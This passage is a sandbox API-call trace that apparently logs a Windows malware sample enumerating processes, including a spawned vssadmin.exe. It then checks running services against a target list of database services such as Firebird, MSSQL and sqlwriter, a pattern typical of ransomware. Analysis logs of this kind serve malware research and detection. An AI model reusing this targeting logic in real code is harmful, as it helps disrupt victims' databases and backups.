	[0051.549] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0051.550] lstrlenW (lpString="winlogon.exe") returned 12
	[0051.550] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0051.550] lstrlenW (lpString="services.exe") returned 12
	[0051.550] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0051.551] lstrlenW (lpString="lsass.exe") returned 9
	[0051.551] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0051.551] lstrlenW (lpString="lsm.exe") returned 7
	[0051.551] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.552] lstrlenW (lpString="svchost.exe") returned 11
	[0051.552] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.552] lstrlenW (lpString="svchost.exe") returned 11
	[0051.552] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.553] lstrlenW (lpString="svchost.exe") returned 11
	[0051.553] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.553] lstrlenW (lpString="svchost.exe") returned 11
	[0051.553] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.554] lstrlenW (lpString="svchost.exe") returned 11
	[0051.554] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0051.554] lstrlenW (lpString="audiodg.exe") returned 11
	[0051.554] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.554] lstrlenW (lpString="svchost.exe") returned 11
	[0051.555] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.555] lstrlenW (lpString="svchost.exe") returned 11
	[0051.555] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0051.555] lstrlenW (lpString="dwm.exe") returned 7
	[0051.555] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0051.556] lstrlenW (lpString="explorer.exe") returned 12
	[0051.556] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0051.556] lstrlenW (lpString="spoolsv.exe") returned 11
	[0051.556] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0051.557] lstrlenW (lpString="taskhost.exe") returned 12
	[0051.557] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.557] lstrlenW (lpString="svchost.exe") returned 11
	[0051.557] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0051.558] lstrlenW (lpString="taskeng.exe") returned 11
	[0051.558] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0051.558] lstrlenW (lpString="taskhost.exe") returned 12
	[0051.558] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0051.559] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0051.559] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0051.559] lstrlenW (lpString="python tragedy.exe") returned 18
	[0051.559] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0051.560] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0051.560] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0051.560] lstrlenW (lpString="computers.exe") returned 13
	[0051.560] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0051.560] lstrlenW (lpString="separated.exe") returned 13
	[0051.561] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0051.561] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0051.561] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0051.561] lstrlenW (lpString="darkness.exe") returned 12
	[0051.561] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0051.562] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0051.562] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0051.562] lstrlenW (lpString="sophisticated.exe") returned 17
	[0051.562] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0051.563] lstrlenW (lpString="wishlist.exe") returned 12
	[0051.563] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0051.563] lstrlenW (lpString="top.exe") returned 7
	[0051.563] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0051.564] lstrlenW (lpString="implemented.exe") returned 15
	[0051.564] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0051.564] lstrlenW (lpString="comp.exe") returned 8
	[0051.564] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0051.565] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0051.565] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0051.565] lstrlenW (lpString="solved.exe") returned 10
	[0051.565] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0051.566] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0051.566] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0051.566] lstrlenW (lpString="trips.exe") returned 9
	[0051.566] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0051.567] lstrlenW (lpString="tumormanual.exe") returned 15
	[0051.567] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0051.567] lstrlenW (lpString="telecom.exe") returned 11
	[0051.567] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0051.568] lstrlenW (lpString="realistic.exe") returned 13
	[0051.568] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0051.568] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0051.568] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0051.569] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0051.569] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0051.569] lstrlenW (lpString="cmd.exe") returned 7
	[0051.569] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0051.570] lstrlenW (lpString="conhost.exe") returned 11
	[0051.570] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0051.570] lstrlenW (lpString="vssadmin.exe") returned 12
	[0051.570] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0051.571] lstrlenW (lpString="VSSVC.exe") returned 9
	[0051.571] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0051.571] lstrlenW (lpString="svchost.exe") returned 11
	[0051.571] Process32NextW (in: hSnapshot=0x188, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0051.572] CloseHandle (hObject=0x188) returned 1
	[0051.572] Sleep (dwMilliseconds=0x1f4) 
	[0052.277] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fbf8
	[0052.284] EnumServicesStatusExW (in: hSCManager=0x7e0fbf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0052.284] GetLastError () returned 0xea
	[0052.284] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb54b838
	[0052.284] EnumServicesStatusExW (in: hSCManager=0x7e0fbf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb54b838, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb54b838, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0052.285] CloseServiceHandle (hSCObject=0x7e0fbf8) returned 1
	[0052.285] lstrlenW (lpString="Appinfo") returned 7
	[0052.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0052.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0052.285] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0052.285] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0052.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0052.285] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0052.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0052.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0052.285] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0052.285] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0052.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0052.285] lstrlenW (lpString="AudioSrv") returned 8
	[0052.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0052.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0052.286] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0052.286] lstrlenW (lpString="BFE") returned 3
	[0052.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0052.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0052.286] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0052.286] lstrlenW (lpString="CryptSvc") returned 8
	[0052.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0052.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0052.286] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0052.286] lstrlenW (lpString="CscService") returned 10
	[0052.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0052.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0052.286] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0052.286] lstrlenW (lpString="DcomLaunch") returned 10
	[0052.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0052.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0052.286] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0052.286] lstrlenW (lpString="Dhcp") returned 4
	[0052.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0052.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0052.286] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0052.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0052.286] lstrlenW (lpString="Dnscache") returned 8
	[0052.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0052.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0052.287] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0052.287] lstrlenW (lpString="DPS") returned 3
	[0052.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0052.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0052.287] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0052.287] lstrlenW (lpString="eventlog") returned 8
	[0052.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0052.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0052.287] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0052.287] lstrlenW (lpString="EventSystem") returned 11
	[0052.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0052.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0052.287] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0052.287] lstrlenW (lpString="gpsvc") returned 5
	[0052.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0052.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0052.287] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0052.287] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0052.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0052.287] lstrlenW (lpString="iphlpsvc") returned 8
	[0052.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0052.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0052.287] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0052.287] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0052.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0052.288] lstrlenW (lpString="LanmanServer") returned 12
	[0052.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0052.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0052.288] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0052.288] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0052.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0052.288] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0052.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0052.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0052.288] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0052.288] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0052.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0052.288] lstrlenW (lpString="lmhosts") returned 7
	[0052.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
